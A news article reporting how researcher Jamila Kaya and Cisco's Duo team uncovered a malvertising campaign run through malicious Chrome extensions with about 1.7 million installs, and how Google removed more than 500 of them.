While she was performing some routine tasks one day that relate to her job of constantly hunting for digital threats online, security researcher Jamila Kaya stumbled across the first in a series of malicious Google Chrome extensions that would spark a two-month investigation and lead to the removal of more than 500 extensions by Google from its web store. Unfortunately, more than 1.7 million Chrome users had already installed that first batch of extensions she found, which gave some urgency to this investigation — the results of which have been unveiled in a newly published report into what turned out to be a huge malware operation active for at least two years.
After her initial discovery, Kaya reached out to the Duo security team at Cisco, according to the report. She contacted them about a variety of Chrome extensions she found that infected browsers and would “exfiltrate data as part of a larger campaign.”
“These extensions were commonly presented as offering advertising as a service,” the report notes. “Jamila discovered they were part of a network of copycat plugins sharing nearly identical functionality. Through collaboration, we were able to take the few dozen extensions and utilize CRXcavator.io to identify 70 matching their patterns across 1.7 million users and escalate concerns to Google.”
The Duo team goes on to explain that bad actors are increasingly using legitimate internet activity to obscure their malicious actions, one of the most popular channels being the use of advertising cookies and the redirects within them. It’s a technique called “malvertising” that is surprisingly hard to detect. “Malvertising often occurs within other programs, acting as a vehicle for multiple forms of fraudulent activity, including ad-fraud, data exfiltration, phishing, and monitoring and exploitation,” the report continues. “Alternatively, it also emerges in multipart malicious campaigns that involve advertising collection and defraudment.”
The code within these malicious extensions would sometimes redirect users to an affiliate link on sites like Best Buy’s or Macy’s. Other times, the destination might be a download site for malware. The researchers said Google was responsive when they escalated the matter up to them, and a Google spokesman said that it always takes action when the research community alerts it to issues that violate the company’s policies. Moreover, Google said it performs “regular sweeps to find extensions” similar to these that use comparable techniques, code, and behaviors.